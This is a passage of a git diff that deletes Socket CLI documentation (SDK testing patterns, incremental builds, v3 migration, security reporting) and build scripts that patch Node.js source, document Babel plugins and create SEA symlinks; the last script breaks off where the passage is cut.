`feature-name.test.mts` | `socket-sdk-quota.test.mts` | -| **Describes** | `'SocketSdk - Feature Name'` | `'SocketSdk - Quota Management'` | -| **Tests** | `'should do something specific'` | `'should fetch quota successfully'` | - -❌ **Avoid:** `test1.test.mts`, `'tests'`, `'it works'` - ---- - -## Usage Patterns - -### Basic SDK Test - -```typescript -import { setupTestClient } from './utils/environment.mts' -import nock from 'nock' - -describe('SocketSdk - Quota', () => { - const getClient = setupTestClient() - - it('should fetch quota successfully', async () => { - nock('https://api.socket.dev') - .get('/v0/quota') - .reply(200, { quota: 1000 }) - - const result = await getClient().getQuota() - expect(result.success).toBe(true) - if (result.success) { - expect(result.data.quota).toBe(1000) - } - }) - - it('should handle 401 errors', async () => { - nock('https://api.socket.dev') - .get('/v0/quota') - .reply(401, { error: { message: 'Unauthorized' } }) - - const result = await getClient().getQuota() - expect(result.success).toBe(false) - if (!result.success) { - expect(result.status).toBe(401) - } - }) -}) -``` - -### Custom SDK Configuration - -```typescript -const getClient = setupTestClient('test-token', { - baseUrl: 'https://custom.api.socket.dev', - timeout: 10000, - userAgent: 'Test/1.0' -}) -``` - -### Multiple API Calls - -```typescript -it('should handle multiple nock mocks', async () => { - nock('https://api.socket.dev') - .get('/v0/orgs/test-org/repos') - .reply(200, { repos: [...] 
}) - .get('/v0/orgs/test-org/repos/repo1') - .reply(200, { name: 'repo1' }) - - const repoList = await getClient().getOrgRepoList('test-org') - const repo1 = await getClient().getOrgRepo('test-org', 'repo1') - - expect(repoList.success).toBe(true) - expect(repo1.success).toBe(true) -}) -``` - -### Error Handling - -```typescript -describe('Error Handling', () => { - const getClient = setupTestClient() - - it('should handle 404 errors', async () => { - nock('https://api.socket.dev') - .get('/v0/nonexistent') - .reply(404, { error: { message: 'Not found' } }) - - const result = await getClient().getData() - expect(result.success).toBe(false) - if (!result.success) { - expect(result.status).toBe(404) - } - }) - - it('should handle network errors', async () => { - nock('https://api.socket.dev') - .get('/v0/endpoint') - .replyWithError('ECONNREFUSED') - - await expect(getClient().getData()).rejects.toThrow() - }) -}) -``` - -### Unit Test with Fixtures - -```typescript -import { mockSuccessResponse, fixtures } from '@socketsecurity/sdk/testing' - -it('should fetch repository', async () => { - const mockSdk = { - getOrgRepo: vi.fn().mockResolvedValue( - mockSuccessResponse(fixtures.repositories.full) - ) - } - - const result = await mockSdk.getOrgRepo('org', 'repo') - expect(result.success).toBe(true) -}) -``` - -### Integration Test with Nock - -```typescript -import nock from 'nock' -import { SocketSdk } from '@socketsecurity/sdk' -import { mockApiErrorBody } from '@socketsecurity/sdk/testing' - -it('should handle API errors', async () => { - nock('https://api.socket.dev') - .get('/v0/repo/org/repo') - .reply(404, mockApiErrorBody('Not found')) - - const client = new SocketSdk('test-token') - const result = await client.getOrgRepo('org', 'repo') - - expect(result.success).toBe(false) -}) -``` - ---- - -## Best Practices - -### 1. 
Always Use Helper Functions - -```typescript -✓ const getClient = setupTestClient() -✗ beforeEach(() => { nock.restore(); nock.activate() }) -``` - -### 2. Type-Safe Result Checking - -```typescript -✓ if (result.success) { - expect(result.data.quota).toBe(1000) // TypeScript knows data exists - } - -✗ expect(result.data.quota).toBe(1000) // TypeScript error -``` - -### 3. Test Both Success and Error Paths - -```typescript -describe('Complete Coverage', () => { - it('should handle success', async () => { /* ... */ }) - it('should handle 401 error', async () => { /* ... */ }) - it('should handle network error', async () => { /* ... */ }) -}) -``` - -### 4. Use Fast Test Config - -```typescript -✓ const getClient = setupTestClient('test-token', { retries: 0 }) -✗ const getClient = setupTestClient('test-token', { retries: 3, retryDelay: 1000 }) -``` - -### 5. Descriptive Naming - -| Type | Good | Bad | -|------|------|-----| -| **File** | `socket-sdk-quota.test.mts` | `test1.test.mts` | -| **Describe** | `'SocketSdk - Quota Management'` | `'tests'` | -| **Test** | `'should fetch quota successfully'` | `'it works'` | - -### 6. Specific Assertions - -```typescript -✓ expect(result.data.quota).toBe(42) -✓ expect(result.data.items).toHaveLength(3) -✓ expect(result.data.name).toContain('value') - -✗ expect(result.data).toBeTruthy() -✗ expect(result.data).toBeDefined() -``` - -### 7. 
Nock Mocking Pattern - -```typescript -nock('https://api.socket.dev') - .get('/v0/endpoint') - .reply(200, { data: 'value' }) - -// Auto cleanup via setupTestClient() -``` - ---- - -## Coverage Mode Behavior - -When running with `--coverage`: - -| Behavior | Regular Mode | Coverage Mode | -|----------|--------------|---------------| -| **Nock validation** | Strict | Relaxed | -| **Pending mocks** | Throw errors | No errors | -| **Cleanup** | Standard | Aggressive (`abortPendingRequests`) | - -### Skip Tests in Coverage Mode - -```typescript -it.skipIf(isCoverageMode)('should test advanced feature', async () => { - // This test only runs in regular mode -}) -``` - ---- - -## Fast Test Configuration - -`FAST_TEST_CONFIG` is automatically applied by test helpers: - -```typescript -{ - retries: 0, // No retries - retryDelay: 0, // No delay - timeout: 5000 // 5 second timeout -} -``` - ---- - -## Key Benefits - -- ✓ **Consistent nock lifecycle** - No forgotten cleanup -- ✓ **Fast test execution** - Optimized timeouts and retries -- ✓ **Type-safe results** - Full TypeScript support -- ✓ **Coverage mode handling** - Automatic adjustments -- ✓ **Reduced boilerplate** - 5-10 lines saved per test file -- ✓ **Rich fixtures** - Pre-built test data -- ✓ **Flexible mocking** - Response builders for any scenario - ---- - -## See Also - -- [CI Testing](./ci-testing.md) - Continuous integration setup -- [Scripts](./scripts.md) - Script organization patterns -- [API Reference](../api-reference.md) - Complete API documentation -- [Test Utils README](../../test/utils/README.md) - Detailed helper docs diff --git a/packages/sdk/docs/incremental-builds.md b/packages/sdk/docs/incremental-builds.md deleted file mode 100644 index 1563323a9..000000000 --- a/packages/sdk/docs/incremental-builds.md +++ /dev/null @@ -1,142 +0,0 @@ -# Incremental Builds - -Guide to optimizing build performance during development. 
- -## Quick Start - -```bash -# Development mode with incremental builds (68% faster) -pnpm build --watch - -# Production build (full rebuild) -pnpm build -``` - -## Performance Comparison - -| Build Type | Time | Use Case | -|------------|------|----------| -| Full build | ~27ms | CI, production, clean builds | -| Incremental | ~9ms | Development, hot reload | -| **Improvement** | **68% faster** | Watch mode only | - -## How It Works - -The build system uses esbuild's incremental mode when `--watch` is enabled: - -1. **First build**: Full compilation (~27ms) -2. **Subsequent builds**: Only changed files (~9ms) -3. **Smart caching**: Build metadata reused across rebuilds -4. **Type checking**: Runs in parallel with bundling - -## Watch Mode Features - -```bash -pnpm build --watch -``` - -**Capabilities:** -- Automatic rebuild on file changes -- Preserved build context for faster increments -- Terminal output shows rebuild times -- Errors displayed immediately - -**Limitations:** -- Type declarations regenerated each time -- Cache not persisted across process restarts -- Memory footprint slightly higher (build context in memory) - -## Development Workflow - -**Recommended setup:** - -```bash -# Terminal 1: Watch mode for builds -pnpm build --watch - -# Terminal 2: Run tests -pnpm test --fast - -# Terminal 3: Type checking (optional) -pnpm tsc --watch -``` - -## Configuration - -Build configuration lives in: -- `scripts/build.mjs` - Main build orchestration -- `.config/esbuild.config.mjs` - esbuild settings -- `.config/tsconfig.dts.json` - Type declaration generation - -## Optimization Tips - -1. **Use watch mode for development** - - 68% faster rebuilds - - Immediate feedback loop - - Lower cognitive load - -2. **Skip checks for quick iterations** - ```bash - pnpm test --fast # Skip lint/type checks - ``` - -3. **Parallel workflows** - - Build in one terminal - - Tests in another - - No waiting for sequential operations - -4. 
**Clean builds when needed** - ```bash - pnpm clean # Remove dist/ - pnpm build # Fresh build - ``` - -## Troubleshooting - -**Issue: Build seems slow** -- Solution: Ensure you're using `--watch` flag -- Check: `NODE_ENV` not set to `production` - -**Issue: Changes not reflected** -- Solution: Kill watch process and restart -- Check: Ensure file is not in `.gitignore` - -**Issue: Type errors not shown** -- Solution: Run `pnpm tsc` separately -- Context: Watch mode prioritizes speed over type checking - -## Implementation Details - -**esbuild configuration:** -```javascript -{ - incremental: isWatch, // Enable incremental mode - bundle: true, - format: 'esm', - platform: 'node', - target: 'node18', - // ... other settings -} -``` - -**Watch mode detection:** -```javascript -const isWatch = process.argv.includes('--watch') -``` - -## Performance Metrics - -**Measured on M1 Mac:** -- Full TypeScript build: ~27ms -- Incremental rebuild: ~9ms -- Type declaration generation: ~15ms (parallel) - -**Total development cycle:** -- Edit → Save → Rebuild: < 50ms -- Edit → Save → Rebuild → Test: < 2s (with `--fast`) - -## See Also - -- `docs/getting-started.md` - Initial setup -- `docs/dev/scripts.md` - All available scripts -- `scripts/build.mjs` - Build script implementation diff --git a/packages/sdk/docs/migration-v3.md b/packages/sdk/docs/migration-v3.md deleted file mode 100644 index 1d797090b..000000000 --- a/packages/sdk/docs/migration-v3.md +++ /dev/null @@ -1,79 +0,0 @@ -# Migration Guide: v2.x to v3.0 - -## Removed Methods - -These methods have been removed. 
Use the modern full scan equivalents: - -- `createScan()` → `createFullScan()` -- `deleteScan()` → `deleteFullScan()` -- `getScan()` → `getFullScan()` -- `listScans()` → `listFullScans()` - -## Method Renames - -### Full Scans - -| v2.x | v3.0 | -|------|------| -| `getOrgFullScanList()` | `listFullScans()` | -| `createOrgFullScan()` | `createFullScan()` | -| `getOrgFullScanBuffered()` | `getFullScan()` | -| `deleteOrgFullScan()` | `deleteFullScan()` | -| `streamOrgFullScan()` | `streamFullScan()` | -| `getOrgFullScanMetadata()` | `getFullScanMetadata()` | - -### Organizations - -| v2.x | v3.0 | -|------|------| -| `getOrganizations()` | `listOrganizations()` | - -### Repositories - -| v2.x | v3.0 | -|------|------| -| `getOrgRepoList()` | `listRepositories()` | -| `getOrgRepo()` | `getRepository()` | -| `createOrgRepo()` | `createRepository()` | -| `updateOrgRepo()` | `updateRepository()` | -| `deleteOrgRepo()` | `deleteRepository()` | - -## Search and Replace - -```bash -# Full scans -getOrgFullScanList → listFullScans -createOrgFullScan → createFullScan -getOrgFullScanBuffered → getFullScan -deleteOrgFullScan → deleteFullScan -streamOrgFullScan → streamFullScan -getOrgFullScanMetadata → getFullScanMetadata - -# Organizations -getOrganizations → listOrganizations - -# Repositories -getOrgRepoList → listRepositories -getOrgRepo → getRepository -createOrgRepo → createRepository -updateOrgRepo → updateRepository -deleteOrgRepo → deleteRepository - -# Removed - use full scan methods -createScan → createFullScan -deleteScan → deleteFullScan -getScan → getFullScan -listScans → listFullScans -``` - -## Type Changes - -v3.0 marks guaranteed API fields as required instead of optional. Fields like `id` and `created_at` are now typed as `string` instead of `string | undefined`, improving IntelliSense. 
- -New strict types available: -- `FullScanListResult` -- `FullScanResult` -- `OrganizationsResult` -- `RepositoriesListResult` -- `DeleteResult` -- `StrictErrorResult` diff --git a/packages/sdk/docs/security.md b/packages/sdk/docs/security.md deleted file mode 100644 index 27231c989..000000000 --- a/packages/sdk/docs/security.md +++ /dev/null @@ -1,7 +0,0 @@ -# Reporting Security Issues - -**Report security vulnerabilities directly to [security@socket.dev](mailto:security@socket.dev).** - -All reports are taken seriously and addressed promptly. - -**Do not report security vulnerabilities through public GitHub issues, discussions, or pull requests.** diff --git a/scripts/apply-socket-mods.mjs b/scripts/apply-socket-mods.mjs deleted file mode 100644 index 5864293b2..000000000 --- a/scripts/apply-socket-mods.mjs +++ /dev/null @@ -1,160 +0,0 @@ -/** - * @fileoverview Apply Socket-specific modifications to Node.js source - * - * This script modifies Node.js source files with Socket-specific changes. - * After running this, you can generate patches with `git diff`. 
- * - * Usage: - * node scripts/apply-socket-mods.mjs - */ - -import { readFile, writeFile } from 'node:fs/promises' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -const ROOT_DIR = join(__dirname, '..') -const BUILD_DIR = join(ROOT_DIR, 'build') -const NODE_DIR = join(BUILD_DIR, 'node-smol') - -/** - * Fix V8 include paths - */ -async function fixV8IncludePaths() { - logger.log('🔧 Fixing V8 include paths...') - - const fixes = [ - { - file: 'deps/v8/src/ast/ast-value-factory.h', - replacements: [ - { - from: '#include "src/base/hashmap.h"', - to: '#include "base/hashmap.h"', - }, - ], - }, - { - file: 'deps/v8/src/heap/new-spaces-inl.h', - replacements: [ - { - from: '#include "src/heap/spaces-inl.h"', - to: '#include "heap/spaces-inl.h"', - }, - ], - }, - { - file: 'deps/v8/src/heap/factory-inl.h', - replacements: [ - { - from: '#include "src/heap/factory-base-inl.h"', - to: '#include "heap/factory-base-inl.h"', - }, - ], - }, - { - file: 'deps/v8/src/objects/js-objects-inl.h', - replacements: [ - { - from: '#include "src/objects/hash-table-inl.h"', - to: '#include "objects/hash-table-inl.h"', - }, - ], - }, - { - file: 'deps/v8/src/heap/cppgc/heap-page.h', - replacements: [ - { - from: '#include "src/base/iterator.h"', - to: '#include "base/iterator.h"', - }, - ], - }, - ] - - for (const { file, replacements } of fixes) { - const filePath = join(NODE_DIR, file) - try { - let content = await readFile(filePath, 'utf8') - let modified = false - - for (const { from, to } of replacements) { - if (content.includes(from)) { - content = content.replace(from, to) - modified = true - logger.log(` ✓ Fixed: ${file}`) - } - } - - if (modified) { - await writeFile(filePath, content, 'utf8') - } - } catch (e) { 
- logger.warn(` ${colors.yellow('⚠')} Could not fix ${file}: ${e.message}`) - } - } - - logger.log(`${colors.green('✓')} V8 include paths fixed`) - logger.log('') -} - -/** - * Enable SEA detection for pkg binaries - */ -async function enableSeaForPkg() { - logger.log('🔧 Enabling SEA detection for pkg binaries...') - - const filePath = join(NODE_DIR, 'lib', 'sea.js') - - try { - let content = await readFile(filePath, 'utf8') - - // Replace the isSea import - const oldImport = - "const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');" - const newImport = `const isSea = () => true; -const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea');` - - if (content.includes(oldImport)) { - content = content.replace(oldImport, newImport) - await writeFile(filePath, content, 'utf8') - logger.log(' ✓ Modified: lib/sea.js') - } else { - logger.log(' ℹ️ lib/sea.js already modified or structure changed') - } - } catch (e) { - logger.warn(` ${colors.yellow('⚠')} Could not modify lib/sea.js: ${e.message}`) - } - - logger.log(`${colors.green('✓')} SEA detection enabled`) - logger.log('') -} - -/** - * Main function - */ -async function main() { - logger.log('🔨 Applying Socket modifications to Node.js source') - logger.log('') - - await fixV8IncludePaths() - await enableSeaForPkg() - - logger.log('🎉 All modifications applied!') - logger.log('') - logger.log('📝 To generate patches:') - logger.log(' cd build/node-smol') - logger.log(' git diff > ../../build/patches/socket/my-changes.patch') - logger.log('') -} - -// Run main function -main().catch(error => { - logger.error(`${colors.red('✗')} Failed to apply modifications:`, error.message) - process.exitCode = 1 -}) diff --git a/scripts/babel/README.md b/scripts/babel/README.md deleted file mode 100644 index c80e8a21b..000000000 --- a/scripts/babel/README.md +++ /dev/null @@ -1,301 +0,0 @@ -# Babel Plugins for Socket CLI - -This directory contains 
custom Babel plugins used to transform Socket CLI code during the build process. - -## Plugins - -### Core Transformation Plugins - -#### `babel-plugin-inline-require-calls.js` -Inlines `require()` calls for better bundling performance. - -#### `transform-set-proto-plugin.mjs` -Transforms `__proto__` assignments into `Object.setPrototypeOf()` calls for strict mode compatibility. - -**Before:** -```javascript -Foo.prototype.__proto__ = Bar.prototype -``` - -**After:** -```javascript -Object.setPrototypeOf(Foo.prototype, Bar.prototype) -``` - -#### `transform-url-parse-plugin.mjs` -Optimizes URL parsing operations. - ---- - -### Strict Mode Plugin - -#### `babel-plugin-strict-mode.mjs` -Transforms loose-mode JavaScript into strict-mode compatible code. - -**Transformations:** -1. **Octal literals** → Decimal numbers -2. **Octal escape sequences** → Proper escape sequences -3. **With statements** → Error (cannot be safely transformed) -4. **Adds 'use strict'** directive if missing - -**Example Transformations:** - -```javascript -// Before: -var x = 0123 // Octal literal -var str = 'Hello\012World' // Octal escape - -// After: -'use strict' -var x = 83 // Decimal (0123 in octal = 83) -var str = 'Hello\nWorld' // Proper escape (\012 = \n) -``` - -**Octal Escape Mappings:** -- `\0` → `\0` (null) -- `\10` → `\b` (backspace) -- `\11` → `\t` (tab) -- `\12` → `\n` (line feed) -- `\13` → `\v` (vertical tab) -- `\14` → `\f` (form feed) -- `\15` → `\r` (carriage return) -- `\16`-`\377` → `\xNN` (hex escape) - -**Usage:** -This plugin is **always enabled** in the build pipeline (see `.config/babel.config.js`). - ---- - -### --with-intl=none Plugin - -#### `babel-plugin-with-intl-none.mjs` -Transforms ICU-dependent code into ICU-free alternatives, enabling Node.js builds with `--with-intl=none`. - -**Note**: `--without-intl` is deprecated, use `--with-intl=none` instead. - -**✅ Status:** This plugin is **ENABLED** in Socket CLI builds. - -**Why enabled:** -1. 
Socket CLI uses `--with-intl=none` for 6-8MB size reduction -2. Combined with runtime Intl stub polyfill for complete compatibility -3. Transforms Socket CLI source code at build time - -**Transformations:** - -##### 1. Number Formatting -```javascript -// Before: -count.toLocaleString() -(1234567).toLocaleString() - -// After: -__formatNumber(count) // → "1,234,567" -__formatNumber(1234567) -``` - -##### 2. Date Formatting -```javascript -// Before: -new Date().toLocaleDateString() -new Date().toLocaleTimeString() - -// After: -__formatDate(new Date()) // → "2025-10-07" -// ISO time format -``` - -##### 3. String Comparison -```javascript -// Before: -str1.localeCompare(str2) - -// After: -__simpleCompare(str1, str2) // Basic < > comparison -``` - -##### 4. Intl.* APIs -```javascript -// Before: -new Intl.NumberFormat().format(num) -new Intl.DateTimeFormat().format(date) - -// After: -{ format: (num) => __formatNumber(num) } -{ format: (date) => date.toISOString() } -``` - -##### 5. Unicode Regular Expressions -```javascript -// Before: -/\p{Letter}/u -/\p{Number}/u -/[\p{Letter}\p{Number}]+/v // ES2024 /v flag - -// After: -/[a-zA-Z]/ -/[0-9]/ -/[a-zA-Z0-9]+/ // /v flag removed, \p{...} transformed -``` - -**Note**: The `/v` flag (unicodeSets, ES2024) is automatically downgraded to `/u` or removed entirely when transforming `\p{...}` patterns. - -**Helper Functions Generated:** -```javascript -function __formatNumber(num) { - return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ',') -} - -function __formatDate(date) { - return date.toISOString().split('T')[0] -} - -function __formatDateTime(date) { - return date.toISOString().replace('T', ' ').replace(/\.\d+Z$/, ' UTC') -} - -function __simpleCompare(a, b) { - return a < b ? -1 : a > b ? 
1 : 0 -} -``` - -**Limitations:** -- ❌ No real locale support (only English-style formatting) -- ❌ No timezone support beyond UTC -- ❌ No currency formatting -- ❌ No plural rules -- ❌ No locale-aware sorting (simple byte comparison only) - -**When to Use:** -- Building pkg binaries where every MB matters -- English-only CLI tool -- Willing to trade locale support for ~8-10MB size reduction - -**Already enabled** in `.config/babel.config.js` (line 36). - -**Build Requirements:** - -1. Node.js must be built with `--with-intl=none`: -```bash -# Use our automated build script: -node scripts/build-yao-pkg-node.mjs --clean - -# This builds Node.js with: -# --disable-single-executable-application (Remove SEA, -1-2 MB) -# --enable-lto (Link-time optimization) -# --v8-disable-object-print (Disable V8 object printing) -# --v8-lite-mode (Smaller V8, -15-20 MB) -# --with-icu-source=none (Don't download ICU source) -# --with-intl=none (ICU removed, -6-8 MB) -# --without-amaro (Remove amaro) -# --without-corepack (Remove corepack) -# --without-inspector (Remove inspector) -# --without-node-code-cache (Remove code cache) -# --without-node-options (Remove node options) -# --without-node-snapshot (Remove snapshot) -# --without-npm (Remove npm) -# --without-sqlite (Remove sqlite) -``` - -2. Rebuild Socket CLI: -```bash -pnpm run build:cli -``` - -**Testing:** -After enabling, verify all CLI output still works: -```bash -# Test number formatting -pnpm exec socket scan --help - -# Test date display -pnpm exec socket info some-package - -# Test full CLI functionality -pnpm run test:unit -``` - ---- - -## Plugin Execution Order - -Plugins run in this order (defined in `.config/babel.config.js`): - -1. `@babel/preset-typescript` (preset) -2. `@babel/preset-react` (preset) -3. `@babel/plugin-proposal-export-default-from` -4. `@babel/plugin-transform-export-namespace-from` -5. `@babel/plugin-transform-runtime` -6. **`babel-plugin-strict-mode.mjs`** ⭐ (fixes loose-mode code) -7. 
`babel-plugin-inline-require-calls.js` -8. `transform-set-proto-plugin.mjs` -9. `transform-url-parse-plugin.mjs` -10. **`babel-plugin-with-intl-none.mjs`** ⭐ (--with-intl=none compatibility, ENABLED) - ---- - -## Development - -### Adding a New Plugin - -1. Create a new file in `scripts/babel/` with the `.mjs` extension -2. Add `@fileoverview` header with description -3. Export a default function that returns a Babel plugin: - -```javascript -/** @fileoverview Brief description of what the plugin does */ - -export default function myPlugin({ types: t }) { - return { - name: 'my-plugin-name', - visitor: { - // AST visitor methods - Identifier(path) { - // Transform code - } - } - } -} -``` - -4. Add the plugin to `.config/babel.config.js`: -```javascript -plugins: [ - // ... - path.join(babelPluginsPath, 'my-new-plugin.mjs'), -] -``` - -### Testing Plugins - -Build and test the transformed output: -```bash -# Build with transformations -pnpm run build:cli - -# Check transformed code -cat dist/cli.js | head -100 - -# Run tests -pnpm run test:unit -``` - ---- - -## Size Impact - -| Plugin | Binary Size Impact | Purpose | -|--------|-------------------|---------| -| `babel-plugin-strict-mode.mjs` | ~0 bytes | Code compatibility | -| `babel-plugin-with-intl-none.mjs` | **-6-8MB** | --with-intl=none compatibility | - -**Note:** The size reduction comes from building Node.js with `--with-intl=none`, not the plugin itself. The plugin transforms code to work without ICU. 
- ---- - -## References - -- [Babel Plugin Handbook](https://github.com/jamiebuilds/babel-handbook/blob/master/translations/en/plugin-handbook.md) -- [Babel Types API](https://babeljs.io/docs/en/babel-types) -- [AST Explorer](https://astexplorer.net/) - Visualize AST transformations -- [Node.js ICU Documentation](https://nodejs.org/api/intl.html) -- [Socket CLI Build Documentation](../../docs/YAO_PKG_BUILD.md) diff --git a/scripts/create-sea-symlinks.mjs b/scripts/create-sea-symlinks.mjs deleted file mode 100644 index 9458e870a..000000000 --- a/scripts/create-sea-symlinks.mjs +++ /dev/null @@ -1,106 +0,0 @@ -/** - * Create symlinks for the unified Socket CLI SEA binary. - * - * This script creates symlinks so that the single SEA binary can be - * invoked as different commands: - * - socket -> socket (main binary) - * - socket-npm -> socket - * - socket-npx -> socket - * - socket-pnpm -> socket - * - socket-yarn -> socket - * - * The bootstrap detects how it was invoked and routes to the appropriate - * Socket CLI command. - * - * Usage: - * node scripts/create-sea-symlinks.mjs ./socket ./output-dir - */ - -import { promises as fs } from 'node:fs' -import path from 'node:path' -import process from 'node:process' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const COMMANDS = ['socket-npm', 'socket-npx', 'socket-pnpm', 'socket-yarn'] - -async function createSymlinks(binaryPath, outputDir) { - const binaryName = path.basename(binaryPath) - const isWindows = process.platform === 'win32' - - // Ensure output directory exists - await fs.mkdir(outputDir, { recursive: true }) - - logger.log(`Creating symlinks for ${binaryName}...`) - - for (const command of COMMANDS) { - const symlinkName = isWindows ? 
`${command}.exe` : command - const symlinkPath = path.join(outputDir, symlinkName) - - try { - // Remove existing symlink if it exists - await fs.unlink(symlinkPath).catch(() => {}) - - if (isWindows) { - // On Windows, copy the executable instead of symlinking - // (symlinks require admin privileges) - logger.log(` Copying ${binaryName} -> ${symlinkName}`) - await fs.copyFile(binaryPath, symlinkPath) - } else { - // On Unix, create a symlink - logger.log(` Linking ${symlinkName} -> ${binaryName}`) - await fs.symlink(binaryName, symlinkPath) - } - } catch (error) { - logger.error(` Failed to create ${symlinkName}: ${error.message}`) - } - } - - logger.log('Symlinks created successfully!') - - if (!isWindows) { - logger.log('\nTo test the symlinks:') - for (const command of COMMANDS) { - logger.log(` ./${path.join(outputDir, command)} --help`) - } - } -} - -// CLI usage -async function main() { - const [, , binaryPath, outputDir] = process.argv - - if (!binaryPath) { - logger.error( - 'Usage: node create-sea-symlinks.mjs [output-dir]', - ) - logger.error('Example: node create-sea-symlinks.mjs ./socket ./dist') - process.exit(1) - } - - const resolvedBinaryPath = path.resolve(binaryPath) - const resolvedOutputDir = outputDir - ? 
path.resolve(outputDir) - : path.dirname(resolvedBinaryPath) - - // Check if binary exists - try { - await fs.access(resolvedBinaryPath) - } catch { - logger.error(`Error: Binary not found at ${resolvedBinaryPath}`) - process.exit(1) - } - - await createSymlinks(resolvedBinaryPath, resolvedOutputDir) -} - -if (import.meta.url === `file://${process.argv[1]}`) { - main().catch(error => { - logger.error('Error:', error) - process.exit(1) - }) -} - -export { createSymlinks } diff --git a/scripts/dev-local.sh b/scripts/dev-local.sh deleted file mode 100755 index 4d62ef97e..000000000 --- a/scripts/dev-local.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env bash -# Helper script to run socket CLI against local depscan API server -# -# Usage: -# ./scripts/dev-local.sh [socket command] -# -# Examples: -# ./scripts/dev-local.sh --version -# ./scripts/dev-local.sh patch discover -# ./scripts/dev-local.sh scan create . - -# Load .env.local if it exists -if [ -f .env.local ]; then - export $(grep -v '^#' .env.local | grep -v '^$' | xargs) -fi - -# Set default local API server URL if not already set -export SOCKET_CLI_API_BASE_URL="${SOCKET_CLI_API_BASE_URL:-http://localhost:8866}" - -echo "🔧 Using API server: $SOCKET_CLI_API_BASE_URL" -echo "" - -# Run the CLI with all arguments passed through -./bin/cli.js "$@" diff --git a/scripts/generate-node-patches.mjs b/scripts/generate-node-patches.mjs deleted file mode 100644 index d7e15ad4d..000000000 --- a/scripts/generate-node-patches.mjs +++ /dev/null @@ -1,213 +0,0 @@ -/** - * @fileoverview Generate Socket-specific patches for Node.js - * - * This script generates patches for Socket CLI's custom Node.js modifications. - * Run this after applying patches but before building to capture - * Socket-specific changes. 
- * - * Usage: - * node scripts/generate-node-patches.mjs [--version v24.10.0] - */ - -import { existsSync } from 'node:fs' -import { mkdir, writeFile } from 'node:fs/promises' -import { dirname, join } from 'node:path' -import { fileURLToPath } from 'node:url' - -import { spawn } from '@socketsecurity/lib/spawn' -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import colors from 'yoctocolors-cjs' - - -const logger = getDefaultLogger() -const __filename = fileURLToPath(import.meta.url) -const __dirname = dirname(__filename) - -// Parse arguments -const args = process.argv.slice(2) -const versionArg = args.find(arg => arg.startsWith('--version=')) -const NODE_VERSION = versionArg ? versionArg.split('=')[1] : 'v24.10.0' - -const ROOT_DIR = join(__dirname, '..') -const BUILD_DIR = join(ROOT_DIR, 'build') -const NODE_DIR = join(BUILD_DIR, 'node-smol') -const PATCHES_OUTPUT_DIR = join(ROOT_DIR, 'build', 'patches', 'socket') - -/** - * Execute a command and capture output - */ -async function exec(command, args = [], options = {}) { - const { cwd = process.cwd() } = options - - logger.log(`$ ${command} ${args.join(' ')}`) - - const result = await spawn(command, args, { - cwd, - stdio: 'pipe', - shell: false, - }) - - if (result.code !== 0) { - throw new Error( - `Command failed with exit code ${result.code}: ${result.stderr}`, - ) - } - - return result.stdout -} - -/** - * Generate fix-v8-include-paths patch - */ -async function generateV8IncludePathsPatch() { - logger.log('📝 Generating fix-v8-include-paths patch...') - - const files = [ - 'deps/v8/src/ast/ast-value-factory.h', - 'deps/v8/src/heap/new-spaces-inl.h', - 'deps/v8/src/heap/factory-inl.h', - 'deps/v8/src/objects/js-objects-inl.h', - 'deps/v8/src/heap/cppgc/heap-page.h', - ] - - let patchContent = `# Fix V8 include paths for Node.js ${NODE_VERSION} -# -# Node.js ${NODE_VERSION} source has incorrect include paths in V8 code -# Files are looking for 'src/base/hashmap.h' when it should be 
'base/hashmap.h' -# This patch removes the incorrect 'src/' prefix from V8 internal includes -# -# This issue causes build failures with errors like: -# fatal error: 'src/base/hashmap.h' file not found -# -# Author: Socket CLI -# Date: ${new Date().toISOString().split('T')[0]} -# Node versions affected: ${NODE_VERSION} -` - - for (const file of files) { - const filePath = join(NODE_DIR, file) - if (!existsSync(filePath)) { - logger.warn(`${colors.yellow('⚠')} File not found: ${file}`) - continue - } - - // Create a git diff for this file - try { - const diff = await exec( - 'git', - ['diff', '--no-index', '/dev/null', file], - { - cwd: NODE_DIR, - }, - ) - patchContent += `\n${diff}` - } catch (_e) { - // git diff returns non-zero for differences, which is expected. - logger.warn(` Skipping ${file} (no changes or error)`) - } - } - - const patchFile = join( - PATCHES_OUTPUT_DIR, - `fix-v8-include-paths-${NODE_VERSION.replace('v', 'v')}.patch`, - ) - await writeFile(patchFile, patchContent) - logger.log(`${colors.green('✓')} Generated: ${patchFile}`) - - return patchFile -} - -/** - * Generate enable-sea-for-pkg-binaries patch - */ -async function generateSeaPatch() { - logger.log('📝 Generating enable-sea-for-pkg-binaries patch...') - - const patchContent = `# Patch: Make isSea() return true for pkg binaries -# -# Overrides the isSea binding to always return true, making pkg binaries -# report as Single Executable Applications for consistency. 
-# -# Author: Socket CLI -# Date: ${new Date().toISOString().split('T')[0]} -# Node version: ${NODE_VERSION} - ---- a/lib/sea.js -+++ b/lib/sea.js -@@ -16,7 +16,8 @@ const { - ERR_UNKNOWN_BUILTIN_MODULE, - } = require('internal/errors').codes; - --const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); -+const isSea = () => true; -+const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); - - const { - setOwnProperty, -` - - const patchFile = join( - PATCHES_OUTPUT_DIR, - `enable-sea-for-pkg-binaries-${NODE_VERSION.replace('v', 'v')}.patch`, - ) - await writeFile(patchFile, patchContent) - logger.log(`${colors.green('✓')} Generated: ${patchFile}`) - - return patchFile -} - -/** - * Main function - */ -async function main() { - logger.log(`🔨 Generating Socket patches for Node.js ${NODE_VERSION}`) - logger.log('') - - // Check if Node.js directory exists - if (!existsSync(NODE_DIR)) { - throw new Error( - `Node.js source directory not found: ${NODE_DIR}\n` + - 'Run build-yao-pkg-node.mjs first to download and patch Node.js source.', - ) - } - - // Ensure output directory exists - await 